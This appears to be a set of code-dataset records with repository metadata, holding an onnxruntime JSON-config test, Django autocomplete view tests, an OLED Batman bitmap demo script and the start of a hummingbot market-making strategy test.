5,185
py
Python
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
1
2022-02-23T07:36:58.000Z
2022-02-23T07:36:58.000Z
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
10
2022-02-15T21:52:24.000Z
2022-02-23T21:26:01.000Z
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
null
null
null
import os import torch from onnxruntime.training import ortmodule from onnxruntime.capi import _pybind_state as C from onnxruntime.training.ortmodule.experimental.json_config import load_from_json class Net(torch.nn.Module): def __init__(self, input_size=784, hidden_size=500, num_classes=10): super(Net, self).__init__() self.fc1 = torch.nn.Linear(input_size, hidden_size) self.relu = torch.nn.ReLU() self.fc2 = torch.nn.Linear(hidden_size, num_classes) def forward(self, input1): out = self.fc1(input1) out = self.relu(out) out = self.fc2(out) return out def test_load_config_from_json_1(): device = 'cuda' model = ortmodule.ORTModule(Net().to(device)) # load from json once. path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_2.json') load_from_json(model, path_to_json) # load from json another time path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_1.json') load_from_json(model, path_to_json) for training_mode in [True, False]: ort_model_attributes = model._torch_module._execution_manager(training_mode) # test propagate cast ops assert ort_model_attributes._propagate_cast_ops_strategy == C.PropagateCastOpsStrategy.FLOOD_FILL assert ort_model_attributes._propagate_cast_ops_level == 3 assert ort_model_attributes._propagate_cast_ops_allow == ["ABC", "DEF"] # test use external gpu allocator assert ort_model_attributes._use_external_gpu_allocator == False # test enable custom autograd function assert ort_model_attributes._enable_custom_autograd_function == True # test allow layer norm mod precision assert ort_model_attributes._allow_layer_norm_mod_precision == True # test use static shape assert ort_model_attributes._use_static_shape == True # test run symbolic shape inference assert ort_model_attributes._run_symbolic_shape_infer == False # test enable grad acc optimization assert ort_model_attributes._enable_grad_acc_optimization == True # test skip check assert 
ort_model_attributes._skip_check.value == 14 # test debug options assert ort_model_attributes._debug_options.save_onnx_models.save == True assert ort_model_attributes._debug_options.save_onnx_models.name_prefix == 'my_model' assert ort_model_attributes._debug_options.logging.log_level.name == "VERBOSE" # test use memory aware gradient builder. assert ort_model_attributes._use_memory_efficient_gradient == False # test fallback policy assert ort_model_attributes._fallback_manager.policy.value == 1 # assert onnx opset version assert ortmodule.ONNX_OPSET_VERSION == 13 def test_load_config_from_json_2(): device = 'cuda' model = ortmodule.ORTModule(Net().to(device)) # load from json once. path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_1.json') load_from_json(model, path_to_json) # load from json another time path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_2.json') load_from_json(model, path_to_json) for training_mode in [True, False]: ort_model_attributes = model._torch_module._execution_manager(training_mode) # test propagate cast ops assert ort_model_attributes._propagate_cast_ops_strategy == C.PropagateCastOpsStrategy.INSERT_AND_REDUCE assert ort_model_attributes._propagate_cast_ops_level == 5 assert ort_model_attributes._propagate_cast_ops_allow == ["XYZ", "PQR"] # test use external gpu allocator assert ort_model_attributes._use_external_gpu_allocator == True # test enable custom autograd function assert ort_model_attributes._enable_custom_autograd_function == False # test allow layer norm mod precision assert ort_model_attributes._allow_layer_norm_mod_precision == False # test use static shape assert ort_model_attributes._use_static_shape == False # test run symbolic shape inference assert ort_model_attributes._run_symbolic_shape_infer == True # test enable grad acc optimization assert ort_model_attributes._enable_grad_acc_optimization == False # test skip check assert 
ort_model_attributes._skip_check.value == 10 # test debug options assert ort_model_attributes._debug_options.save_onnx_models.save == True assert ort_model_attributes._debug_options.save_onnx_models.name_prefix == 'my_other_model' assert ort_model_attributes._debug_options.logging.log_level.name == "INFO" # test use memory aware gradient builder. assert ort_model_attributes._use_memory_efficient_gradient == True # test fallback policy assert ort_model_attributes._fallback_manager.policy.value == 250 # assert onnx opset version assert ortmodule.ONNX_OPSET_VERSION == 12
39.280303
112
0.734041
674
5,185
5.237389
0.194362
0.072521
0.163173
0.203966
0.843059
0.843059
0.828895
0.828895
0.777904
0.747875
0
0.008193
0.199614
5,185
131
113
39.580153
0.84241
0.150241
0
0.272727
0
0
0.065128
0.053016
0
0
0
0
0.484848
1
0.060606
false
0
0.075758
0
0.166667
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
824ebbcc69de0f98edb989ba3f25e9b4815bca36
5,651
py
Python
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
4
2018-03-01T10:22:30.000Z
2020-04-04T16:31:11.000Z
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
60
2018-05-20T04:42:32.000Z
2022-02-10T17:03:37.000Z
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
1
2018-08-04T05:06:45.000Z
2018-08-04T05:06:45.000Z
import pytest from django.urls import reverse pytestmark = pytest.mark.django_db # UserAutocomplete def test_userautocomplete_full(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == user.email def test_userautocomplete_query(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == user.email def test_userautocomplete_anonymous(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url) assert res.status_code != 200 # now 302 should be 401 ? # ChannelAutocomplete def test_channelautocomplete_full(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == channel1.name def test_channelautocomplete_query(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner url = '%s?q=%s' % (url, channel1.name) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == channel1.name def test_channelautocomplete_anonymous(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url) assert res.status_code != 200 # now 302 should be 401 ? 
# AddressAutocomplete def test_addressautocomplete_full(django_app, organization_member): url = reverse('address-autocomplete') user = organization_member.user res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user.addresses.first()) def test_addressautocomplete_query(django_app, organization_member): url = reverse('address-autocomplete') user = organization_member.user url = '%s?q=%s' % (url, user.addresses.first().label) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user.addresses.first()) # ApplicationAutocomplete def test_applicationutocomplete_full(django_app, application1): url = reverse('application-autocomplete', args=[application1.organization.slug]) user = application1.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == application1.name def test_applicationautocomplete_query(django_app, application1): url = reverse('application-autocomplete', args=[application1.organization.slug]) user = application1.organization.owner url = '%s?q=%s' % (url, application1.name) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == application1.name # OrganizationMembersAutocomplete def test_organization_memberautocomplete_full(django_app, organization_member): url = reverse('org-member-autocomplete', args=[organization_member.organization.slug]) user = organization_member.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_organization_memberautocomplete_query(django_app, organization_member): url = reverse('org-member-autocomplete', args=[organization_member.organization.slug]) user = organization_member.user url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) # ApplicationMembersAutocomplete def test_application_memberautocomplete_full(django_app, application_member): url = 
reverse('app-member-autocomplete', args=[application_member.application.organization.slug, application_member.application.slug]) user = application_member.application.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_application_memberautocomplete_query(django_app, application_member): url = reverse('app-member-autocomplete', args=[application_member.application.organization.slug, application_member.application.slug]) user = application_member.application.organization.owner url = '%s?q=%s' % (url, str(user)) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) # ApplicationCandidateAutocomplete def test_application_candidate_autocomplete_full(django_app, application1, organization_member): url = reverse('app-candidate-autocomplete', args=[application1.organization.slug, application1.slug]) user = application1.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_application_candidate_autocomplete_query(django_app, application1, organization_member): url = reverse('app-candidate-autocomplete', args=[application1.organization.slug, application1.slug]) user = application1.organization.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user)
36.224359
100
0.702707
659
5,651
5.881639
0.095599
0.074303
0.049536
0.06192
0.839267
0.823787
0.823787
0.816821
0.816821
0.816821
0
0.01362
0.168466
5,651
155
101
36.458065
0.811236
0.039639
0
0.757576
0
0
0.103378
0.035444
0
0
0
0
0.161616
1
0.161616
false
0
0.020202
0
0.181818
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82895a4947ee65f734f316b39cf83e5a328bf2ec
9,282
py
Python
BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2021-11-28T21:44:41.000Z
2021-11-28T21:44:41.000Z
BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2017-11-14T09:19:52.000Z
2017-11-14T17:48:44.000Z
BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2019-03-25T03:42:28.000Z
2019-03-25T03:42:28.000Z
import OledLib from OmegaExpansion import oledExp from random import randint import time batman = [ [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,1,1,1], [1,1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1], [1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1], [1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1], [1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,1], 
[1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1], [1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1], [1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1], [1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1], [1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1], [1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,0,1,1,1], [1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1], [1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1], [1,1,1,1,1,1,0,0,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,1,1,1], [1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1], 
[1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,0,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1] ] start = int(round(time.time() * 1000)) # bitmap blitting example at random positions oledExp.clear() oledExp.write("Bitmap bliting") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) for i in range(10): OledLib.putBitmap(randint(0, 60), randint(8, 20), batman) OledLib.blit() frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Bitmap bliting took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scalling example (zooming in, both axes scale) oledExp.clear() oledExp.write("Scaling: zoom in") time.sleep(2) frames = 0 exampleStart = int(round(time.time() * 1000)) for scale in range(8, 0, -1): scaledBatman = OledLib.scaleBitmap(batman, scale, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() frames += 1 
exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Scaling: zoom in took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # rotate bitmap 90, 180, 270, 360 degrees oledExp.clear() oledExp.write("Rotation: 90, 180, 270 degrees") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) rotatedBatman = OledLib.rotateBitmap90(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 rotatedBatman = OledLib.rotateBitmap180(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 rotatedBatman = OledLib.rotateBitmap270(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 h = len(batman) w = len(batman[0]) OledLib.putBitmap(64-w/2, 32-h/2, batman) OledLib.blit() frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Rotation: 90, 180, 270 degrees took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scaling example (x-axis only) oledExp.clear() oledExp.write("Scaling: x-axis") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) scale = 1 while scale<=8: scaledBatman = OledLib.scaleBitmap(batman, scale, 1) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale += 1 frames += 1 scale = 8 while scale>0: scaledBatman = OledLib.scaleBitmap(batman, scale, 1) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale -= 1 frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart 
print("Scaling: x-axis took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scaling and rotating example (y-axis only) oledExp.clear() oledExp.write("Scaling and rotating: y-axis") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) OledLib.putBitmap(64-w/2, 32-h/2, batman) OledLib.blit() frames += 1 scale = 1 while scale<=8: scaledBatman = OledLib.scaleBitmap(batman, 1, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale += 1 frames += 1 rotatedBatman = OledLib.rotateBitmap180(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) scale = 8 while scale>0: scaledBatman = OledLib.scaleBitmap(rotatedBatman, 1, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale -= 1 frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Scaling and rotating: y-axis took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) oledExp.write("Enjoy OledLib!") end = int(round(time.time() * 1000)) print("Demo completed in: " + str(end-start) + " milliseconds.")
45.724138
130
0.593407
3,000
9,282
1.836
0.027333
0.455338
0.62037
0.761801
0.903595
0.870552
0.870552
0.856391
0.844771
0.823711
0
0.299297
0.06518
9,282
203
131
45.724138
0.335485
0.02187
0
0.67033
0
0
0.049372
0
0
0
0
0
0
1
0
false
0
0.021978
0
0.021978
0.087912
0
0
1
null
1
1
1
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
12
82d015988c97ae925e2eadd43142e3b0e6557133
78,102
py
Python
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
null
null
null
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
null
null
null
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
1
2020-05-15T03:37:03.000Z
2020-05-15T03:37:03.000Z
#!/usr/bin/env python from os.path import join, realpath import sys; sys.path.insert(0, realpath(join(__file__, "../../"))) from hummingbot.strategy.market_trading_pair_tuple import MarketTradingPairTuple from decimal import Decimal import logging; logging.basicConfig(level=logging.ERROR) import pandas as pd from typing import List import unittest import time from hummingsim.backtest.backtest_market import BacktestMarket from hummingsim.backtest.market import ( AssetType, Market, MarketConfig, QuantizationParams ) from hummingsim.backtest.mock_order_book_loader import MockOrderBookLoader from hummingbot.core.clock import ( Clock, ClockMode ) from hummingbot.core.event.event_logger import EventLogger from hummingbot.core.event.events import ( MarketEvent, OrderBookTradeEvent, TradeType, OrderType, OrderFilledEvent, BuyOrderCompletedEvent, SellOrderCompletedEvent, TradeFee ) from hummingbot.core.data_type.order_book import OrderBook from hummingbot.core.data_type.order_book_row import OrderBookRow from hummingbot.core.data_type.limit_order import LimitOrder from hummingbot.strategy.pure_market_making.pure_market_making_v2 import PureMarketMakingStrategyV2 from hummingbot.strategy.pure_market_making import ( ConstantSpreadPricingDelegate, PassThroughFilterDelegate, ConstantMultipleSpreadPricingDelegate, ConstantSizeSizingDelegate, StaggeredMultipleSizeSizingDelegate, InventorySkewSingleSizeSizingDelegate, InventorySkewMultipleSizeSizingDelegate, OrderBookAssetPriceDelegate, DataFeedAssetPriceDelegate ) from hummingbot.data_feed.data_feed_base import DataFeedBase from hummingbot.core.utils.exchange_rate_conversion import ExchangeRateConversion from hummingbot.core.network_base import NetworkStatus from hummingbot.client.command.config_command import ConfigCommand class MockDataFeed(DataFeedBase): @property def name(self): return self._name def __init__(self, name, coin_prices): super().__init__() self._name = name self._mock_price_dict = coin_prices 
self._network_status = NetworkStatus.CONNECTED async def check_network(self) -> NetworkStatus: return NetworkStatus.CONNECTED @property def price_dict(self): return self._mock_price_dict def get_price(self, trading_pair): return self._mock_price_dict.get(trading_pair.upper()) def start(self): pass def stop(self): pass class PureMarketMakingV2UnitTest(unittest.TestCase): start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC") end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC") start_timestamp: float = start.timestamp() end_timestamp: float = end.timestamp() maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"] def setUp(self): self.clock: Clock = Clock(ClockMode.BACKTEST, 60.0, self.start_timestamp, self.end_timestamp) self.clock_tick_size = 60 self.maker_market: BacktestMarket = BacktestMarket() self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.mid_price = 100 self.bid_threshold = 0.01 self.ask_threshold = 0.01 self.order_refresh_time = 45 self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10) self.constant_pricing_delegate = ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold)) self.constant_sizing_delegate = ConstantSizeSizingDelegate(Decimal("1.0")) self.filter_delegate = PassThroughFilterDelegate() self.equal_strategy_sizing_delegate = StaggeredMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0"), order_levels=Decimal("5") ) self.staggered_strategy_sizing_delegate = StaggeredMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0.5"), order_levels=Decimal("5") ) self.multiple_order_strategy_pricing_delegate = ConstantMultipleSpreadPricingDelegate( bid_spread=Decimal(self.bid_threshold), ask_spread=Decimal(self.ask_threshold), order_level_spread=Decimal("0.01"), order_levels=Decimal("5") ) 
self.maker_market.add_data(self.maker_data) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) self.maker_market.set_balance("QETH", 500) self.maker_market.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *( [self.maker_market] + self.maker_trading_pairs ) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options ) self.multi_order_equal_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, order_refresh_time=45, logging_options=logging_options ) self.multi_order_staggered_strategy: PureMarketMakingStrategyV2 = 